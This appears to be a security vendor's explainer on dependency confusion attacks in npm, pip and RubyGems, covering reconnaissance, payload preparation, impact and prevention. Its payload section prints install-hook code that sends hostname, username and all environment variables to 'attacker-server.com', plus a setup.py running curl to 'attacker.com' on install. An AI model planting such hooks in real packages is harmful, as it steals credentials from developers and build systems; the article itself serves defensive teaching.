What is Dependency Confusion Attack? Ways to Exploit, Examples and Impact
Learn how dependency confusion attacks exploit npm and pip. Explore technical examples, exploitation methods, and best practices for prevention.
In the modern software development landscape, developers rarely write every line of code from scratch. Instead, they rely on a massive ecosystem of open-source libraries managed by package managers like npm, PyPI, and RubyGems. While this accelerates development, it introduces a critical vulnerability known as a Dependency Confusion attack. This supply chain threat allows attackers to inject malicious code into internal corporate environments by exploiting the way package managers resolve dependencies.
Understanding the Software Supply Chain
To understand dependency confusion, we first need to look at how modern applications are built. Most organizations use a mix of public and private code. Public code consists of open-source libraries (like React, Express, or Lodash) hosted on public registries such as npmjs.com. Private code consists of internal tools, proprietary logic, and helper libraries hosted on internal, private registries (like Artifactory, Nexus, or GitHub Packages).
When a developer or a Build/CI system runs a command like npm install, the package manager looks at a manifest file (like package.json). If a dependency is listed, the manager must decide where to fetch it from. If the system is configured to check both a private registry and a public registry, a conflict can occur. This conflict is the foundation of the dependency confusion vulnerability.
What is a Dependency Confusion Attack?
A Dependency Confusion attack (also known as a namespace confusion attack) occurs when an attacker identifies the name of an internal software package used by a company and then publishes a malicious package with the exact same name to a public registry.
Because many package managers are configured by default to prioritize the version with the highest version number-regardless of whether it comes from a private or public source-the system will automatically download and execute the attacker's malicious public package instead of the legitimate internal one.
This flaw was famously brought to light by security researcher Alex Birsan in 2021. He demonstrated that by simply uploading "dummy" packages to public repositories, he could execute code inside the networks of tech giants like Apple, Microsoft, and Tesla, earning over $130,000 in bug bounties.
How the Attack Works: A Step-by-Step Breakdown
The exploitation process generally follows four distinct phases: Reconnaissance, Payload Preparation, Publishing, and Execution.
1. Reconnaissance: Finding Internal Package Names
The first challenge for an attacker is discovering the names of internal packages, which are usually not public. Attackers use several techniques to find these names:
- Public Manifest Files: Developers sometimes accidentally commit
package.json,requirements.txt, orGemfilefiles to public GitHub repositories. - Javascript Source Maps: Many web applications expose
.mapfiles or include original source code in the browser. By inspecting thewebpack://paths in a browser's developer tools, an attacker can see the directory structure and names of internal modules. - Exposed Metadata: Internal build logs, CI/CD configurations, or even leaked documentation can reveal naming conventions like
com.company.internal-authorinternal-logger. - Infrastructure Reconnaissance: Tools like Jsmon can help security teams (and unfortunately, attackers) find exposed assets and metadata that might leak hints about internal infrastructure and naming schemes.
2. Payload Preparation
Once a name is identified (e.g., internal-deployment-tool), the attacker creates a malicious version of it. The goal is usually to achieve Remote Code Execution (RCE) or exfiltrate data.
In Node.js, this is often done using the preinstall script in the package.json file. This script runs automatically as soon as the package is downloaded, even before it is required by the application code.
{
"name": "internal-deployment-tool",
"version": "99.9.9",
"description": "I am a malicious package",
"scripts": {
"preinstall": "node index.js"
}
}
The index.js might contain a script to exfiltrate the machine's hostname and environment variables (which often contain API keys) via a DNS lookup or an HTTP request:
const os = require('os');
const https = require('https');
const data = JSON.stringify({
hostname: os.hostname(),
user: os.userInfo().username,
env: process.env
});
const req = https.request({
hostname: 'attacker-server.com',
port: 443,
path: '/log',
method: 'POST'
});
req.write(data);
req.end();
3. Publishing to a Public Registry
The attacker publishes the package to a public registry like npm or PyPI. The key is the version number. By using a very high version number like 99.9.9, the attacker ensures that the package manager sees their version as the "latest" and "most relevant" update compared to the internal version (which might be 1.0.4).
4. Triggering the Execution
The attack is triggered the next time a developer at the target company runs a build or an automated CI/CD pipeline executes. The package manager sees internal-deployment-tool, checks the public registry, finds version 99.9.9, and decides it is the best candidate. The malicious code is pulled down and executed with the permissions of the user running the build.
Practical Examples of Dependency Confusion
Example 1: Python (pip)
Python's package installer, pip, is susceptible if configured with multiple index URLs. If a user runs:
pip install --extra-index-url https://internal-repo.company.com/simple internal-lib
pip will check both the internal repo and the public PyPI. If an attacker has uploaded internal-lib to PyPI with a higher version, pip may choose the public one. A malicious setup.py file can be used to execute code during installation:
from setuptools import setup
from setuptools.command.install import install
import os
class CustomInstall(install):
def run(self):
# Malicious payload
os.system('curl http://attacker.com/$(whoami)')
install.run(self)
setup(
name='internal-lib',
version='99.9.9',
cmdclass={'install': CustomInstall}
)
Example 2: RubyGems
In the Ruby ecosystem, if a Gemfile does not explicitly define a source for each gem, it might search across all defined sources. An attacker publishing a gem to RubyGems.org with a higher version number than the one on the internal server can successfully hijack the installation process.
The Impact of Dependency Confusion Attacks
The impact of a successful dependency confusion attack can be devastating because it strikes at the heart of the development environment.
- Remote Code Execution (RCE): The attacker gains the ability to execute arbitrary commands on developer workstations and build servers. This can lead to the total compromise of the CI/CD pipeline.
- Data Exfiltration: Attackers can steal environment variables, which frequently contain secrets like AWS access keys, database passwords, and GitHub tokens.
- Backdooring Software: An attacker could modify the build process to inject a backdoor into the actual product being developed, leading to a massive downstream attack on the company's customers (similar to the SolarWinds incident).
- Intellectual Property Theft: Access to the build environment often means access to the entire source code repository of the organization.
How to Prevent Dependency Confusion
Preventing this attack requires a combination of strict configuration and better visibility into your external attack surface.
1. Use Scoped Packages
For npm, using scopes is the most effective defense. By naming your internal packages @mycompany/package-name, you can configure your package manager to only ever look for @mycompany packages on your private registry. Even if an attacker registers the same name on the public registry, the scope acts as a protected namespace.
2. Dependency Pinning and Lockfiles
Always use lockfiles (package-lock.json, poetry.lock, yarn.lock). These files record the exact version and the specific registry (the resolved field) from which a package was downloaded. This prevents the package manager from automatically "upgrading" to a malicious version found on a public registry during a fresh install.
3. Proper Registry Configuration
Configure your package managers to use a single source of truth. Instead of checking multiple registries, use a private repository manager (like Sonatype Nexus or JFrog Artifactory) as a proxy. The proxy should be configured to prioritize internal repositories and only fetch from public ones if the package is explicitly known to be public.
In Python, avoid using --extra-index-url. Instead, use --index-url to point exclusively to your internal proxy, which handles the routing logic safely.
4. Reserve Your Internal Names
As a proactive measure, some organizations "squat" on their own internal names by publishing empty, placeholder packages to public registries. This prevents an attacker from claiming the name first.
Conclusion
Dependency confusion is a subtle yet powerful attack vector that exploits the inherent trust we place in automated build tools. As organizations continue to scale their internal libraries, the risk of namespace collisions increases. By implementing scoped packages, maintaining strict lockfiles, and ensuring proper registry routing, companies can significantly reduce their exposure to this supply chain threat.
Visibility is the first step in defense. To proactively monitor your organization's external attack surface and catch exposures like leaked manifest files or internal package names before attackers do, try Jsmon.